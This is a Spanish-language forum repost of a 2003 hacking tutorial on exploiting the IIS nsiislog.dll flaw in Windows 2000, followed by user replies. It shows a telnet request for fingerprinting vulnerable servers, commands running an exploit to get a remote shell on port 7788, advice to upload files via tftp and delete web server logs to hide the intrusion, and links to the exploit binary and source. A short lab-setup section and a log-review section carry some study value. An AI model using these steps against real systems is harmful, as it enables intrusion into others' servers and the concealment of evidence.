Autor
2.- Como saber si un sistema es vulnerable
3.- Creando un sistema vulnerable
4.- Consiguiendo acceso por telnet
5.- Echando un vistazo a los logs
6.- Agradecimientos y Despedida
1.- Sistemas vulnerables
^^^^^^^^^^^^^^^^^^^^
Tal y como podemos ver en la web de securityfocus[1], los sitemas vulnerables son:
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
2.- Como saber si un sistema es vulnerable
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Para saber si un sistema es vulnerable lo que debemos hacer es un telnet a su puerto 80 y hacer una peticion al servidor, aqui os muestro la respuesta del servidor en caso de ser y no ser vulnerable:
NOTA: Se han eliminado los tags html para facilitar la publicacion del documento.
Siendo vulnerable responderia:
SeSoX ~# telnet 192.168.0.25 80
Trying 192.168.0.25...
Connected to 192.168.0.25.
Escape character is '^]'.
GET /scripts/nsiislog.dll HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 18 Jul 2003 12:23:46 GMT
Content-Type: text/html
NetShow ISAPI Log Dll
NetShow ISAPI Log Dll
Connection closed by foreign host.
NO siendo vulnerable responderia:
SeSoX ~# telnet 192.168.0.25 80
Trying 192.168.0.25...
Connected to 192.168.0.25.
Escape character is '^]'.
GET /scripts/nsiislog.dll HTTP/1.0
HTTP/1.1 500 Error del servidor
Server: Microsoft-IIS/5.0
Date: Fri, 18 Jul 2003 12:29:02 GMT
Content-Type: text/html
Content-Length: 105
Error
No se puede encontrar el módulo especificado.
Connection closed by foreign host.
En caso de no ser vulnerable tambien nos podria responder con otras cosas como por ejemplo:
Error
%1 no es una aplicación Win32 válida.
Connection closed by foreign host.
Pero esto ya os lo dejo a cada uno.
3.- Creando un sistema vulnerable
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Lo que tenemos que hacer para que un sistema w2k sea vulnerable es instalar el propio windows,
el IIS y tambien el windows media services. Si vamos a hacer una instalacion nueva de w2k debemos
tener en cuenta que el windows media services no lo podemos seleccionar para que se instale en
la propia instalacion de windows (en este caso el bug no funciona) debemos instalarlo despues
desde la opcion de agregar o quitar programas. De este modo, hacemos la instalacion de windows
con el IIS y una vez echo esto, instalamos windows media services desde agregar o quitar programas,
si nos fijamos esto nos creara un fichero (NSIISLOG.DLL) dentro de la carpeta scripts del
directorio del servidor web (IIS) y una vez comprobado esto, podemos usar el paso 2 para comprobar
que realmente somos vulnerables. En caso de que no os funcione, podeis probar a reiniciar el
servidor web desde panel de control -> servicios -> Servicio de publicacion en Wordl Wide Web.
4.- Consiguiendo acceso por telnet
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Bueno, una vez localizado un servidor vulerable usando la tecnica explicada en el punto 2 debemos
usar el exploit[2] para poder conseguir una cuenta en el sistema, lo que debemos hacer es lo
siguiente:
C:>nsiislog 192.168.0.25
C:>telnet 192.168.0.25 7788
Microsoft Windows 2000 [Versi¢n 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:WINNTsystem32>
Ya tenemos acceso al sistema!!!!!!!!!!!! ahora deja volar tu imaginacion };)
Podemos usar tftp para subir ficheros al servidor y si somos un poco paranoicos
pasarnos por el directorio c:\winnt\system32\logfiles\w3svc1\ para borrar los logs.
5.- Echando un vistazo a los logs
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Revisando un poco los logs que deja este ataque, podemos ver algo como lo siguiente:
Fichero: C:\WINNT\system32\LogFiles\W3SVC1\ex030718.log
2003-07-18 12:45:02 192.168.0.25 - 192.168.0.25 80 POST /scripts/nsiislog.dll - 500 -
En el caso del test para saber si el sistema es o no vulnerable el log seria:
2003-07-18 12:32:24 192.168.0.25 - 192.168.0.25 80 GET /scripts/nsiislog.dll - 500 -
5.- Agradecimientos y Despedida
^^^^^^^^^^^^^^^^^^^^^^^^^^^
Agradecer a ASzY la revicion de este documento, a toda la peña que me ha ayudado cuando lo
he necesitado y a toda la gente que escribe textos como este para enseñar cosillas a los demas.
Si os surge cualquier duda, encontrais algun fallo o quereis añadir algo en este texto, no dudeis
en escribirme a (sesox at govannom dot org) por que estare encantado de leer vuestros correos.
Que tengais una divertida y productiva caza!!!!
[1] http://www.securityfocus.com/bid/8035
[2] http://www.terra.es/personal6/robesan/nsiislog.exe
http://www.terra.es/personal6/robesan/xfocus-nsiislog.c
Mas informacion:
http://www.terra.es/personal6/robesan/IIS_Media.pdf
http://www.derkeiler.com/Mailing-Lists/NT-Bugtraq/2003-07/0014.html
http://rynhozeros.com.ar/article478.html
http://www.vsantivirus.com/vulms03-022.htm
http://www.vsantivirus.com/vulms03-019.htm
Tambien podeis consultar este texto en la sección de seguridad de www.govannom.org.
------------------------------------------------------------
Nota del Moderador: Vi el enlace en www.cyruxnet.com.ar, y este articulo es el link:
http://www.govannom.org/modules.php?name=News&file=article&sid=55
Me parecio muy interesante el que se publique aki... Ya estoy revisando el codigo C del exploit 8)
En línea
he visto vuestras foros i esta muy muy muy bien y pienso que tengo cosas a ponner dentro pero tengo un problemo con este exploit lo he compilado y el tuyo cuando hago c:\nsiislog.exe me da Connect Failed.Error:10049 solamente no me da nada d'otro ni argumentos o no puedo poner des ips en toce no se lo que va 
(( gracias por sus respuestas
es echo como todo el tiempo demarrer o startup para los ingles y cmd despues cd c:\**\ y nsiislog.dll 
gracias por tu respuesta 
